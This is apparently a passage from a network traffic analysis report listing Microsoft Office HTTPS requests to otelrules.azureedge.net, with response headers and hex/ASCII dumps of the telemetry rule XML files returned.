                      2024-12-03 16:52:17 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73
                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSys


                      Session IDSource IPSource PortDestination IPDestination Port
                      120192.168.2.64983813.107.246.63443
                      TimestampBytes transferredDirectionData
                      2024-12-03 16:52:17 UTC192OUTGET /rules/rule700350v1s19.xml HTTP/1.1
                      Connection: Keep-Alive
                      Accept-Encoding: gzip
                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                      Host: otelrules.azureedge.net
                      2024-12-03 16:52:18 UTC494INHTTP/1.1 200 OK
                      Date: Tue, 03 Dec 2024 16:52:17 GMT
                      Content-Type: text/xml
                      Content-Length: 1360
                      Connection: close
                      Vary: Accept-Encoding
                      Cache-Control: public, max-age=604800, immutable
                      Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                      ETag: "0x8DC582BDD74D2EC"
                      x-ms-request-id: a0e0d5c5-a01e-0084-68de-419ccd000000
                      x-ms-version: 2018-03-28
                      x-azure-ref: 20241203T165217Z-174f7845968frfdmhC1EWRxxbw000000165g00000000qdtm
                      x-fd-int-roxy-purgeid: 0
                      X-Cache: TCP_HIT
                      Accept-Ranges: bytes
                      2024-12-03 16:52:18 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73 74 65 6d 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSystem" S="Medium" /> <F T="2">


                      Session IDSource IPSource PortDestination IPDestination Port
                      121192.168.2.64983913.107.246.63443
                      TimestampBytes transferredDirectionData
                      2024-12-03 16:52:17 UTC192OUTGET /rules/rule703901v0s19.xml HTTP/1.1
                      Connection: Keep-Alive
                      Accept-Encoding: gzip
                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                      Host: otelrules.azureedge.net
                      2024-12-03 16:52:18 UTC494INHTTP/1.1 200 OK
                      Date: Tue, 03 Dec 2024 16:52:18 GMT
                      Content-Type: text/xml
                      Content-Length: 1427
                      Connection: close
                      Vary: Accept-Encoding
                      Cache-Control: public, max-age=604800, immutable
                      Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                      ETag: "0x8DC582BE56F6873"
                      x-ms-request-id: c562a2d5-001e-0082-3a33-445880000000
                      x-ms-version: 2018-03-28
                      x-azure-ref: 20241203T165218Z-174f7845968swgbqhC1EWRmnb4000000169g00000000peh6
                      x-fd-int-roxy-purgeid: 0
                      X-Cache: TCP_HIT
                      Accept-Ranges: bytes
                      2024-12-03 16:52:18 UTC1427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75
                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703901" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="Nexu


                      Session IDSource IPSource PortDestination IPDestination Port
                      122192.168.2.64984013.107.246.63443
                      TimestampBytes transferredDirectionData
                      2024-12-03 16:52:18 UTC192OUTGET /rules/rule703900v0s19.xml HTTP/1.1
                      Connection: Keep-Alive
                      Accept-Encoding: gzip
                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                      Host: otelrules.azureedge.net
                      2024-12-03 16:52:18 UTC494INHTTP/1.1 200 OK
                      Date: Tue, 03 Dec 2024 16:52:18 GMT
                      Content-Type: text/xml
                      Content-Length: 1390
                      Connection: close
                      Vary: Accept-Encoding
                      Cache-Control: public, max-age=604800, immutable
                      Last-Modified: Tue, 09 Apr 2024 00:27:49 GMT
                      ETag: "0x8DC582BE3002601"
                      x-ms-request-id: fd6cd5ca-101e-0028-67ee-448f64000000
                      x-ms-version: 2018-03-28
                      x-azure-ref: 20241203T165218Z-174f7845968qj8jrhC1EWRh41s000000161000000000xwtg
                      x-fd-int-roxy-purgeid: 0
                      X-Cache: TCP_HIT
                      Accept-Ranges: bytes
                      2024-12-03 16:52:18 UTC1390INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 53 3d
                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703900" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenServiceabilityManager" S=


                      Session IDSource IPSource PortDestination IPDestination Port
                      123192.168.2.64984113.107.246.63443
                      TimestampBytes transferredDirectionData
                      2024-12-03 16:52:18 UTC192OUTGET /rules/rule701501v1s19.xml HTTP/1.1
                      Connection: Keep-Alive
                      Accept-Encoding: gzip
                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                      Host: otelrules.azureedge.net
                      2024-12-03 16:52:18 UTC494INHTTP/1.1 200 OK
                      Date: Tue, 03 Dec 2024 16:52:18 GMT
                      Content-Type: text/xml
                      Content-Length: 1401
                      Connection: close
                      Vary: Accept-Encoding
                      Cache-Control: public, max-age=604800, immutable
                      Last-Modified: Tue, 09 Apr 2024 00:27:48 GMT
                      ETag: "0x8DC582BE2A9D541"
                      x-ms-request-id: cf0c8647-701e-003e-063e-4079b3000000
                      x-ms-version: 2018-03-28
                      x-azure-ref: 20241203T165218Z-174f784596886s2bhC1EWR743w000000168000000000czck
                      x-fd-int-roxy-purgeid: 0
                      X-Cache: TCP_HIT
                      Accept-Ranges: bytes
                      2024-12-03 16:52:18 UTC1401INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 63 75 72 69 74 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53
                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenS


                      Session IDSource IPSource PortDestination IPDestination Port
                      124192.168.2.64984213.107.246.63443
                      TimestampBytes transferredDirectionData
                      2024-12-03 16:52:19 UTC192OUTGET /rules/rule701500v1s19.xml HTTP/1.1
                      Connection: Keep-Alive
                      Accept-Encoding: gzip
                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                      Host: otelrules.azureedge.net
                      2024-12-03 16:52:19 UTC494INHTTP/1.1 200 OK
                      Date: Tue, 03 Dec 2024 16:52:19 GMT
                      Content-Type: text/xml
                      Content-Length: 1364
                      Connection: close
                      Vary: Accept-Encoding
                      Cache-Control: public, max-age=604800, immutable
                      Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                      ETag: "0x8DC582BEB6AD293"
                      x-ms-request-id: 97972df5-901e-008f-1591-3f67a6000000
                      x-ms-version: 2018-03-28
                      x-azure-ref: 20241203T165219Z-174f7845968cpnpfhC1EWR3afc00000015ug00000000ds79
                      x-fd-int-roxy-purgeid: 0
                      X-Cache: TCP_HIT
                      Accept-Ranges: bytes
                      2024-12-03 16:52:19 UTC1364INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 63 75 72 69 74 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 63 75 72 69 74 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e
                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSecurity" S="Medium" /> <F T="2">


                      Session IDSource IPSource PortDestination IPDestination Port
                      125192.168.2.64984313.107.246.63443
                      TimestampBytes transferredDirectionData
                      2024-12-03 16:52:19 UTC192OUTGET /rules/rule702801v1s19.xml HTTP/1.1
                      Connection: Keep-Alive
                      Accept-Encoding: gzip
                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                      Host: otelrules.azureedge.net
                      2024-12-03 16:52:20 UTC494INHTTP/1.1 200 OK
                      Date: Tue, 03 Dec 2024 16:52:20 GMT
                      Content-Type: text/xml
                      Content-Length: 1391
                      Connection: close
                      Vary: Accept-Encoding
                      Cache-Control: public, max-age=604800, immutable
                      Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                      ETag: "0x8DC582BDF58DC7E"
                      x-ms-request-id: 6de228a0-301e-0052-2e05-4165d6000000
                      x-ms-version: 2018-03-28
                      x-azure-ref: 20241203T165220Z-174f7845968pght8hC1EWRyvxg00000009b000000000ehkt
                      x-fd-int-roxy-purgeid: 0
                      X-Cache: TCP_HIT
                      Accept-Ranges: bytes
                      2024-12-03 16:52:20 UTC1391INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 38 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 44 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 44 58 22 20 53
                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S


                      Session IDSource IPSource PortDestination IPDestination Port
                      126192.168.2.64984413.107.246.63443
                      TimestampBytes transferredDirectionData
                      2024-12-03 16:52:20 UTC192OUTGET /rules/rule702800v1s19.xml HTTP/1.1
                      Connection: Keep-Alive
                      Accept-Encoding: gzip
                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                      Host: otelrules.azureedge.net
                      2024-12-03 16:52:20 UTC494INHTTP/1.1 200 OK
                      Date: Tue, 03 Dec 2024 16:52:20 GMT
                      Content-Type: text/xml
                      Content-Length: 1354
                      Connection: close
                      Vary: Accept-Encoding
                      Cache-Control: public, max-age=604800, immutable
                      Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
                      ETag: "0x8DC582BE0662D7C"
                      x-ms-request-id: bf56a963-f01e-0096-46b4-4310ef000000
                      x-ms-version: 2018-03-28
                      x-azure-ref: 20241203T165220Z-174f7845968jrjrxhC1EWRmmrs00000016e0000000002q85
                      x-fd-int-roxy-purgeid: 0
                      X-Cache: TCP_HIT
                      Accept-Ranges: bytes
                      2024-12-03 16:52:20 UTC1354INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 38 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 44 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 44 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f
                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S="Medium" /> <F T="2"> <O


                      Session IDSource IPSource PortDestination IPDestination Port
                      127192.168.2.64984513.107.246.63443
                      TimestampBytes transferredDirectionData
                      2024-12-03 16:52:20 UTC192OUTGET /rules/rule703351v0s19.xml HTTP/1.1
                      Connection: Keep-Alive
                      Accept-Encoding: gzip
                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                      Host: otelrules.azureedge.net
                      2024-12-03 16:52:21 UTC494INHTTP/1.1 200 OK
                      Date: Tue, 03 Dec 2024 16:52:20 GMT
                      Content-Type: text/xml
                      Content-Length: 1403
                      Connection: close
                      Vary: Accept-Encoding
                      Cache-Control: public, max-age=604800, immutable
                      Last-Modified: Tue, 09 Apr 2024 00:27:39 GMT
                      ETag: "0x8DC582BDCDD6400"
                      x-ms-request-id: bc5dfdd1-701e-005c-6a03-45bb94000000
                      x-ms-version: 2018-03-28
                      x-azure-ref: 20241203T165220Z-174f7845968psccphC1EWRuz9s00000016k00000000012by
                      x-fd-int-roxy-purgeid: 0
                      X-Cache: TCP_HIT
                      Accept-Ranges: bytes
                      2024-12-03 16:52:21 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 33 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 63 72 69 70 74 4c 61 62 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703351" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                      Session IDSource IPSource PortDestination IPDestination Port
                      128192.168.2.64984613.107.246.63443
                      TimestampBytes transferredDirectionData
                      2024-12-03 16:52:20 UTC192OUTGET /rules/rule703350v0s19.xml HTTP/1.1
                      Connection: Keep-Alive
                      Accept-Encoding: gzip
                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                      Host: otelrules.azureedge.net
                      2024-12-03 16:52:21 UTC494INHTTP/1.1 200 OK
                      Date: Tue, 03 Dec 2024 16:52:21 GMT
                      Content-Type: text/xml
                      Content-Length: 1366
                      Connection: close
                      Vary: Accept-Encoding
                      Cache-Control: public, max-age=604800, immutable
                      Last-Modified: Tue, 09 Apr 2024 00:27:42 GMT
                      ETag: "0x8DC582BDF1E2608"
                      x-ms-request-id: eea98567-901e-007b-3159-44ac50000000
                      x-ms-version: 2018-03-28
                      x-azure-ref: 20241203T165221Z-174f7845968qj8jrhC1EWRh41s000000165000000000eu2u
                      x-fd-int-roxy-purgeid: 0
                      X-Cache: TCP_HIT
                      Accept-Ranges: bytes
                      2024-12-03 16:52:21 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 33 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 63 72 69 70 74 4c 61 62 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 63 72 69 70 74 4c 61 62 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703350" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenScriptLab" S="Medium" /> <F T="2


                      Session IDSource IPSource PortDestination IPDestination Port
                      129192.168.2.64984813.107.246.63443
                      TimestampBytes transferredDirectionData
                      2024-12-03 16:52:22 UTC192OUTGET /rules/rule703500v0s19.xml HTTP/1.1
                      Connection: Keep-Alive
                      Accept-Encoding: gzip
                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                      Host: otelrules.azureedge.net
                      2024-12-03 16:52:22 UTC494INHTTP/1.1 200 OK
                      Date: Tue, 03 Dec 2024 16:52:22 GMT
                      Content-Type: text/xml
                      Content-Length: 1362
                      Connection: close
                      Vary: Accept-Encoding
                      Cache-Control: public, max-age=604800, immutable
                      Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                      ETag: "0x8DC582BDF497570"
                      x-ms-request-id: 500645f0-d01e-0049-2151-41e7dc000000
                      x-ms-version: 2018-03-28
                      x-azure-ref: 20241203T165222Z-174f7845968pght8hC1EWRyvxg00000009ag00000000gk7u
                      x-fd-int-roxy-purgeid: 0
                      X-Cache: TCP_HIT
                      Accept-Ranges: bytes
                      2024-12-03 16:52:22 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 35 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 61 6e 64 62 6f 78 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 61 6e 64 62 6f 78 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703500" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSandbox" S="Medium" /> <F T="2">


                      Session IDSource IPSource PortDestination IPDestination Port
                      130192.168.2.64984913.107.246.63443
                      TimestampBytes transferredDirectionData
                      2024-12-03 16:52:22 UTC192OUTGET /rules/rule701801v1s19.xml HTTP/1.1
                      Connection: Keep-Alive
                      Accept-Encoding: gzip
                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                      Host: otelrules.azureedge.net
                      2024-12-03 16:52:22 UTC494INHTTP/1.1 200 OK
                      Date: Tue, 03 Dec 2024 16:52:22 GMT
                      Content-Type: text/xml
                      Content-Length: 1403
                      Connection: close
                      Vary: Accept-Encoding
                      Cache-Control: public, max-age=604800, immutable
                      Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                      ETag: "0x8DC582BDC2EEE03"
                      x-ms-request-id: a8b72aac-901e-005b-059f-432005000000
                      x-ms-version: 2018-03-28
                      x-azure-ref: 20241203T165222Z-174f7845968xlwnmhC1EWR0sv800000015y000000000t089
                      x-fd-int-roxy-purgeid: 0
                      X-Cache: TCP_HIT
                      Accept-Ranges: bytes
                      2024-12-03 16:52:22 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 38 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 73 6f 75 72 63 65 73 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
